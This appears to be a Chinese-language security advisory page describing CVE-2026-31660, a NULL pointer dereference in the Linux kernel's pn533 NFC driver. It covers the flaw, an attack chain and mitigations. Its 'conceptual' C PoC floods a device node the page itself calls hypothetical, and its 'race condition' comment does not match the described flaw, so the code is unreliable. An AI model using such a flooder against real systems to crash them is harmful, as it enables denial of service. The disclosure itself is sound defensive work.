CVE-2026-31660 CVSS 5.5 中危

CVE-2026-31660 Linux内核pn533驱动空指针解引用漏洞

披露日期: 2026-04-24

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31660

漏洞类型

空指针解引用

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的NFC pn533驱动存在空指针解引用漏洞。在pn532_receive_buf()函数处理接收数据时，代码逻辑存在缺陷，即在消耗字节之后才分配新的接收缓冲区。如果内存分配失败，尽管已经消耗了字节，回调函数仍返回0，这不仅违反了receive_buf()的统计约定，还导致recv_skb指针为NULL。在下一次接收回调时，skb_put_u8()操作该空指针将引发系统崩溃，导致拒绝服务。

技术细节

该漏洞源于Linux内核drivers/nfc/pn533/目录下的驱动代码。漏洞触发点在于pn532_receive_buf()函数的数据处理流程。当Serdev层传递数据给驱动时，驱动需要将数据填入recv_skb。原代码先处理数据包，再尝试为新包分配缓冲区。若系统内存紧张导致alloc_skb()失败，函数返回0（通知上层未处理数据），但内部状态已改变，且recv_skb被置空。当后续数据到达时，驱动试图向recv_skb写入数据（通过skb_put_u8），直接访问NULL地址，触发内核异常。由于CVSS向量为AV:L/PR:L，攻击者需要本地低权限账户，并结合特定的NFC硬件交互或内存耗尽条件来利用此漏洞导致系统崩溃。

攻击链分析

STEP 1

获取访问权限

攻击者获取目标系统的本地低权限用户访问权限。

STEP 2

触发数据接收

攻击者与连接的PN533 NFC设备进行交互，发送大量数据或特定格式的帧，触发内核驱动的接收处理函数。

STEP 3

诱导内存分配失败

在系统内存紧张的情况下，或者通过特定操作，诱导pn532_receive_buf中的alloc_skb()分配失败。

STEP 4

触发空指针解引用

驱动程序在分配失败后处理后续数据包时，尝试写入未初始化的NULL指针，导致内核崩溃，实现拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * Conceptual PoC for CVE-2026-31660
 * This PoC simulates the interaction required to trigger the race condition.
 * Exploitation requires a local user with access to the NFC device.
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

// Hypothetical device node for the PN533 NFC interface
#define NFC_DEV "/dev/pn533"

int main() {
    int fd;
    char buffer[1024];
    ssize_t bytes_written;

    printf("[+] Attempting to open %s...\n", NFC_DEV);
    fd = open(NFC_DEV, O_RDWR);
    if (fd < 0) {
        perror("[-] Failed to open device");
        printf("[-] Note: This requires the specific hardware to be present.\n");
        return 1;
    }

    printf("[+] Device opened successfully.\n");
    printf("[*] Flooding the device to stress memory allocation...\n");

    // Loop to generate traffic and stress the receive buffer allocation logic
    while (1) {
        memset(buffer, 0xAA, sizeof(buffer));
        bytes_written = write(fd, buffer, sizeof(buffer));
        
        if (bytes_written < 0) {
            perror("[-] Write failed");
            break;
        }
        
        // The goal is to trigger the alloc_skb() failure inside pn532_receive_buf()
        // which leads to the NULL pointer dereference on the next callback.
        usleep(1000);
    }

    close(fd);
    return 0;
}

影响范围

Linux Kernel (修复前版本，具体参考各发行版安全公告)

防御指南

临时缓解措施

禁用内核中的NFC支持模块（如果系统不需要NFC功能），或者严格限制本地用户对NFC设备节点的访问权限，直到内核升级完成。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表